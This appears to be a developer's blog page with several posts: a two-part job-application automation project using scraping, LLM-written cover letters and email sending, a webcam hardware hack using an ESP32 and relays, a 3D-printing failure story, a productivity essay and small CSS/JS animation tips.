with Shadcn for UI components Backend: Express.js and nodejs (with typescript) Database: MongoDB for the job data Queue System: Redis for background jobs AI Integration: Modular setup supporting multiple providers Different job boards need different scripts Rate limits hit at different times You want to test new approaches without breaking existing ones Raw HTML from job boards Cleanup scripts Generated JSON Email templates Processing status Cleanup scripts: Access to read raw HTML and save cleaned JSON Fetch scripts: Network access to job boards and data storage Email generation scripts: Access to AI models and resume data Email sending scripts: Access to email services and campaign status updates Each script gets queued in Redis with: Campaign ID Script type (cleanup, fetch, email generation) Script content A worker process runs continuously, waiting for new jobs. It uses to create a sandboxed environment for each script. Why? Because running arbitrary JavaScript is dangerous, and I enjoy sleeping at night. Each script runs in its own sandbox with: A custom that streams to Redis Access to only its input data Complete isolation from the main system No artificial time limits (because processing 100 jobs takes longer than processing 1) Timestamped Stored in Redis by campaign and script type Streamed back to the UI in real-time Takes the output and saves it to the right place in MongoDB Updates the campaign status Cleans up any temporary data Moves on to the next job Raw HTML Processing: User dumps raw HTML from job boards into a campaign A script using Cheerio extracts basic details (job ID, title, salary) Smart error handling catches missing fields early HTML gets minified to save storage (we went from 175KB to 32KB per job) Job Details Fetching: System hits each job URL with proper headers (looking like a real browser) Handles different request types (GET for main page, POST for "how to apply") Adds delays between requests (2-3 seconds) to be nice to job boards Handles timeouts and expired job postings gracefully AI-Powered Data Cleaning: Turns messy HTML into structured job data Extracts everything from salary ranges to required skills Formats job descriptions as clean markdown Every response includes metadata about processing time and data quality Cover Letter Generation: Pulls your resume from a configured source (GitHub in my case) Matches your skills against job requirements Generates both HTML and plain text versions Even includes metadata about which skills matched Fails fast if critical info is missing Smart Resume Handling: Pulls your resume from a configured source Parses skills and experience Maps your background to job requirements Template-Free Generation: No generic "I saw your posting" emails Each letter references specific job details System tracks key points addressed Includes metadata about skill matches Quality Control: Generates both HTML and plain text versions Fails fast if critical info is missing Tracks missing recommended fields Analyzes tone and content Sending System: Handles rate limiting automatically BCC's you on all applications Getting rejected by AWS The pitfalls of self-hosted SMTP servers Understanding why big companies don't want you sending automated job applications Finally finding a solution that works The complete source code Guide on writing scripts and using the application (written with the same attention to detail as my commit messages - "fixed stuff") Video demo of the system in action

0 views
David Dodda 11 months ago

How I Automated My Job Application Process. (Part 1)

Look, I'll be honest - job hunting sucks. It's this soul-crushing cycle of copying and pasting the same information over and over again, tweaking your resume for the 100th time, and writing cover letters that make you sound desperate without actually sounding desperate. But here's the thing: repetitive tasks + structured process = perfect automation candidate. So I did what any sane developer would do - I built a system to automate the whole damn thing. By the end, I had sent out 250 job applications in 20 minutes. (The irony? I got a job offer before I even finished building it. More on that later.) Let me walk you through how I did it. Think about it - every job application follows the same basic pattern: Find job posting Check if you're qualified Research company (let's be real, most people skip this) Submit resume + cover letter Wait... and wait... and wait... It's like a really boring video game where you do the same quest over and over, hoping for different results. I started by writing some quick Python scripts to test if this crazy idea could work. Here's how I broke it down: First challenge: getting job listings at scale. I tried web scraping but quickly realized something: job boards are like snowflakes - each one is uniquely annoying to scrape. I tested dumping entire web pages into an LLM to clean the data, but: It was expensive as hell I didn't want the AI hallucinating job requirements (imagine explaining that in an interview) So I went old school - manual HTML copying. Yes, it's primitive. Yes, it works. Sometimes the simplest solution is the best solution. The raw HTML was a mess, but I needed structured data like this: Pro tip: You can just show ChatGPT a sample of your HTML and the output format you want, and it'll write the parsing script for you. Work smarter, not harder. This part was straightforward but required some finesse. For each job listing, I made a GET request to fetch the full description. Each request returns raw HTML that still has all the website scaffolding - navigation bars, popups, footer junk, the works. I wrote a simple HTML parser to strip out everything except the actual job description. Sometimes you'll hit extra hurdles - like having to click a button to reveal the recruiter's email or company details. The good news? Since you're working with one job board at a time, you only need to figure out these patterns once. Pro tip: Always add delays between requests. I set mine to 2-3 seconds. Sure, it makes the process slower, but it's better than getting your IP banned. Don't be that person who DDOSes job boards - I added delays between requests because I'm not a monster. This is where it gets interesting. Job postings are like people - they all have the same basic parts but the organization is chaos. Some list skills at the top, others bury them in paragraphs of corporate speak. Enter the LLM prompt that saved my sanity: The secret to good cover letters? Context. I fed my resume into the LLM along with the job details. This way, the AI could match my experience with their requirements. Suddenly, those "I'm excited about this opportunity" letters actually had substance. Here's the prompt that made it happen: The prompt does a few clever things: Forces structured output - no wishy-washy responses Tracks which of your skills match the job requirements Identifies any missing info that could strengthen the application Generates both HTML and plain text versions (because some job portals hate formatting) And here's the kicker - it fails fast if critical info is missing. No more generic "I saw your job posting" emails. Either the cover letter has substance, or it doesn't get sent. Period. (I start all all my prompts with please, so that when AI eventually takes over, they would consider me friendly 😁) Last step - actually sending these beautifully crafted applications. Sounds simple, right? Just hook up an email service and blast away? Not so fast. I needed a way to: Send professional-looking emails Track what was actually sent Monitor responses (can't ghost the recruiters) Not get flagged as spam (crucial!) For testing, I sent all emails to a test account first. Pro tip: when you do send to actual recruiters, BCC yourself. Nothing worse than wondering "did that email actually go through?" At this stage of the POC, I just used a simple email provider like Mailgun. Quick, dirty, but effective. Don't worry - in Part 2, I'll tell you about the rabbit hole I went down trying to build a full email management system. (Spoiler: it involves rejected AWS applications and a failed attempt at running my own email server. Good times.) The proof of concept worked better than expected. I could take a job board, extract listings, parse them, and generate personalized applications - all with a few Python scripts. But this was just the beginning. The real challenge? Turning these scripts into a proper application that could: Handle multiple job boards Track applications Manage email responses Not get me blacklisted from every HR system in existence In Part 2, I'll show you how I built the actual application, complete with all the technical decisions, trade-offs, and "what was I thinking" moments. Stay tuned - it gets even better. Want to know when Part 2 drops? Follow me on Twitter or LinkedIn . And yes, I'll eventually tell you how I got a job offer before finishing this project. It's a good story. Find job posting Check if you're qualified Research company (let's be real, most people skip this) Submit resume + cover letter Wait... and wait... and wait... It was expensive as hell I didn't want the AI hallucinating job requirements (imagine explaining that in an interview) Forces structured output - no wishy-washy responses Tracks which of your skills match the job requirements Identifies any missing info that could strengthen the application Generates both HTML and plain text versions (because some job portals hate formatting) Send professional-looking emails Track what was actually sent Monitor responses (can't ghost the recruiters) Not get flagged as spam (crucial!) Handle multiple job boards Track applications Manage email responses Not get me blacklisted from every HR system in existence

0 views
David Dodda 1 years ago

Breaking My Camera (to make it better): A hardware hacking story

I've been using a hand-me-down Sony a5000 as my webcam for nearly 4 years. There was one massive pain point though: every time I needed to focus, adjust zoom, or simply turn it on, I had to physically lean over my desk like a caveman and touch the camera. This camera is from a different era (released in 2014), so it lacks remote control capabilities, especially when used as a webcam. So I did what any reasonable person would do - I cracked it open and took matters into my own hands. First, I needed to understand how this camera's controls worked. After finding a repair manual online and watching a helpful YouTube video, I was able to disassemble it without any issues. After studying the repair manual, I identified the circuit responsible for all the functionality I wanted to control. All the buttons and switches that controlled power, zoom, and focus were on a single flexible PCB (RL-1025 FLEXIBLE BOARD). Initially, I considered intercepting the signals at the mainboard where the flex cable connects, but that was beyond my skill level due to the micro-soldering required. So I chose the more straightforward path and modified the flexible board directly. Here's what I did: Desoldered the original buttons (zoom, power, and focus) Soldered 5 wires to the flex board (4 to the pads left from the previous step + one for ground) Routed the wires through the hole where the shutter button was supposed to be Reassembled the camera after testing for any short circuits Now we had 5 wires to work with. By connecting any of the 4 function wires (zoom in, zoom out, power, focus) to ground, we could mimic a button press. That's pretty cool, but not particularly helpful yet - you can't just hot-wire the camera like you're trying to steal a car every time you want to turn it on. So I connected the wires to a 4-channel relay that could be controlled by any micro-controller. I chose an ESP32-based micro-controller for two reasons: It would let me control the camera over WiFi The ESP32-C3 Super Mini has a very small footprint (18mm x 22mm) and comes with a built-in ceramic antenna After writing some code for the micro-controller, I set up a simple web dashboard to control the relays over the network. After adding all these controls to the camera, it would have been a shame to still need to get up to adjust the angle once it was set up. So why not add some pan and tilt functionality as well? I designed and 3D printed a simple 2-axis gimbal using two servo motors. This addition allows the camera to rotate both horizontally and vertically, all controlled through the same ESP32 board and web interface. Is this janky? Maybe a little. But does it work? You bet it does. The best part? Every time someone asks about my camera setup on calls, I get to say, "Oh yeah, I built that myself." The total cost for the project was less than Rs1500 ($17.73), not including the cost of the camera. NOTE: If you're opening any camera that has flash functionality, make sure to discharge the capacitors first. If you shock yourself, it hurts really badly and can potentially cause lasting damage. I want to add side-to-side movement. I have some spare aluminum extrusion that I might use to create a gantry mechanism, adding an additional degree of movement. Desoldered the original buttons (zoom, power, and focus) Soldered 5 wires to the flex board (4 to the pads left from the previous step + one for ground) Routed the wires through the hole where the shutter button was supposed to be Reassembled the camera after testing for any short circuits It would let me control the camera over WiFi The ESP32-C3 Super Mini has a very small footprint (18mm x 22mm) and comes with a built-in ceramic antenna

0 views
David Dodda 1 years ago

How I turned a perfect week into a 12-hour nightmare (a 3D printing story)

Listen - we need to talk about that moment when your perfectly dialed-in 3D printer decides to become your worst enemy. Here's what happened: Last night: Check on print before bed. First 10 layers? PERFECT. chef's kiss I'm feeling like a genius. "Look at those layer lines. Smooth like butter." Me, an intellectual: "I'll just let it run overnight." (Future me is already laughing) 6AM: Stumble to bathroom. Haven't even grabbed my toothbrush. Glance at printer. Instead of my beautiful print, I'm staring at what looks like a modern art piece made of plastic spaghetti. The whole thing warped so bad, my print head decided to take it for a joyride around the build plate. The betrayal hits different before coffee. You know what's worse than a failed print? A failed print that waited until you weren't looking to fail. Like a teenager throwing a party when parents leave town. 12 hours and 200gms of fancy filament later, here's what I learned: When your prints look like abstract art, it usually comes down to THREE things (not two, I can't count before coffee): Your temperature is wrong You forgot about retraction Your bed game is weak (yes, that's a thing) Here's how to fix each one: Temperature Drama Hot end too hot? Spaghetti art Too cold? Layer separation city The fix: Print a Temperature Tower. Every. New. Material. Takes 40-50 mins (find the gcode online or in your slicer) Saves you from my morning nightmare Retraction Settings Look, it's not rocket science. Turn them on. Your slicer has them somewhere. Google exists. Use it. The Bed Situation Here's the thing about beds - they're like relationships: Temperature matters (too cold, nothing sticks) Level matters (if it's not level, nothing else matters) Sometimes you need extra help (enter: the glue stick hack) The crazy part? All of this could have been prevented with a simple temperature tower test. But no... I had to learn it the "wake up to chaos" way. Let me break down the levels of 3D printing pain: LEVEL 1: Print fails while you watch LEVEL 2: Print fails overnight LEVEL 3: Print fails in the final 1% (I'm still recovering from that one) Listen - don't be like me. Print the damn temperature tower first Verify with a quick calibration cube Double-check those retraction settings Your morning routine (and your filament budget) will thank you. P.S. Yes, you can use a glue stick. No, it's not cheating. Yes, I judged people who did this before today. P.P.S. Yes, my teeth are brushed now. Priorities. P.P.P.S. Want to save yourself 12 hours and a morning crisis? Just remember: Temperature tower first Retraction on Glue stick ready Your temperature is wrong You forgot about retraction Your bed game is weak (yes, that's a thing) Hot end too hot? Spaghetti art Too cold? Layer separation city The fix: Print a Temperature Tower. Every. New. Material. Takes 40-50 mins (find the gcode online or in your slicer) Saves you from my morning nightmare Temperature matters (too cold, nothing sticks) Level matters (if it's not level, nothing else matters) Sometimes you need extra help (enter: the glue stick hack) Print the damn temperature tower first Verify with a quick calibration cube Double-check those retraction settings Temperature tower first Retraction on Glue stick ready

0 views
David Dodda 1 years ago

Duck Incremental Growth, Grow at Light-Speed

"Slow and steady wins the race." Here's the truth: If you want to win the race, you need to be a cheetah, not a tortoise. When motivation strikes and you're ready to make a change, most people make the mistake of trying to grow incrementally in multiple areas at once. They set a bunch of small goals, hoping to slowly but surely improve across the board. But here's the problem: It's really freakin' hard to make progress in a bunch of different areas simultaneously. Your focus gets split, your energy gets drained, and before you know it, you've made a millimeter of progress in a million different directions. Pick ONE thing you want to absolutely crush and become the best at. Then, give every waking hour of your life to it. Immerse yourself completely. Make it your North Star. Your media consumption, your reading, your learning, your experimentation - everything should revolve around this singular pursuit. If it's not pushing you closer to mastery in your chosen field, cut it out. Ruthlessly. Forget about it. Work-life balance and rest are for people who are coasting or have already reached their goals. Winners are too busy sprinting towards the finish line to worry about balance. Now maybe you're thinking: "What if I pick the wrong thing to obsess over?" Doesn't matter. Give it a solid month of single-minded focus. If after 30 days, you realize it's not for you, congrats - you figured it out faster than 99% of people. Plus, you've still gained a level of proficiency that will be a valuable tool in your toolbelt going forward. Pick your path, put on your blinders, and grow at light-speed. Before you know it, you'll be miles ahead of the pack - while they're still inching along like tortoises. Remember: Obsession is a competitive advantage. Incremental progress is the slow lane. There's no speed limit on the road to greatness - so floor it.

0 views
David Dodda 1 years ago

Cool Profile Picture Animation in HTML, CSS, and JS

I saw this cool pixilation filter in the About Us section of a landing page, but it was static and boring. So, I created this effect using pure HTML, CSS, and JS and animated it on hover to reveal the faces. Photo by Alex Suprun on Unsplash I added this cool animated pixel effect to my portfolio site. It makes the profile picture come to life when you hover over it. Check it out at daviddodda.com . and shutout to @d omi_kissi and @inCleveri for the inspiration.

0 views
David Dodda 1 years ago

Cool Btn Hover Animation! (react)

IDK, just some cool btn hover animation. yoinked it from stream elements landing page.

0 views
David Dodda 1 years ago

Beyond Generation: Getting the Most Out of AI-Generated Images

Welcome to the whimsical world of AI-generated images, where the only thing more exciting than creating them is jazzing them up! Let's embark on a pixel-perfect journey with four fab tools: Cleanup.pictures , Remove.bg , Imgupscaler.com , and Vectorizer.ai . First up is Cleanup.pictures , the digital equivalent of a magic wand. Wave goodbye to those photobombing squirrels or pesky power lines. This tool uses AI magic to make unwanted elements vanish - abraclean-dabra! Next, Remove.bg takes the stage. It's like a magician who makes backgrounds disappear in a poof! Perfect for when you want your subject to stand out, not the random lamp post in the background. Its so easy, you might say the backgrounds just 'PNG-out' of existence. Then there's Imgupscaler.com , your fairy godmother for small, blurry images. It transforms your 'Cinderella' pixels into a stunning 4K 'ball-ready' vision. No more squinting at pixelated pictures - it's time for a clarity party! Finally, Vectorizer.ai turns your images into vectors, the superheroes of scalability. Whether you're going as small as an ant or as big as a billboard, these vectors won't lose their cool. It's like yoga for your images - stretch without the stress! So there you have it, a journey from pixel purgatory to digital paradise. Remember, with these tools in your arsenal, your AI-generated images can go from 'meh' to 'masterpiece' in a few fun-filled steps.

0 views
David Dodda 1 years ago

Custom Cursors For The Web: Enhance UX with CSS & JS

In the world of web design, it's the small details that make a big difference. Customizing the cursor and adding a follower animation can significantly boost the interactivity and visual appeal of your website. This blog post will guide you through adding a custom cursor along with a follower effect using CSS and JavaScript. Start by adding two elements in your HTML, one for the cursor and another for the cursor follower: These elements will serve as our custom cursor and its follower. Next, style both the cursor and the follower in CSS: After setting up the HTML and CSS for the custom cursor and its follower, we need to add an function in JavaScript. This function will create a smooth following motion for the cursor follower, enhancing the interactive experience. Use JavaScript to make the custom cursor track the mouse movement: This script enables the cursor and follower to follow the mouse movements on the screen. Enhance your cursor's interactivity with hover animations over links by incorporating Font Awesome icons. First, ensure you've included Font Awesome in your HTML. Here, we use version 4: Modify your HTML links to include attributes that reference specific Font Awesome icons. It's important to use the correct icon name as per Font Awesome version 4: In this example, will correspond to the Twitter icon in Font Awesome v4. To ensure you are using the correct icon names from Font Awesome version 4, visit their website and search for icons. The icon name should exactly match the value in the attribute. Font Awesome v4 Icons. Add CSS for the hover state of the cursor. When hovering over a link, the cursor will change its appearance and include the Font Awesome icon: Use JavaScript to change the cursor's appearance based on the hovered link. The cursor will dynamically display the corresponding Font Awesome icon: With these steps, your website's cursor will not only follow the mouse but also change its appearance based on the hovered link, along with a follower enhancing the visual effect. Custom cursor animations and follower effects offer a unique and creative way to boost user engagement on your website. By following the steps outlined above, you not only add these dynamic features but also open up a world of customization. Feel free to experiment and tweak the existing CSS and JavaScript to truly make these animations and effects your own. Whether it's adjusting the animation speed, changing colors, or experimenting with different shapes and sizes, the possibilities are endless. Dive in and give your site a personalized touch that reflects your style.

0 views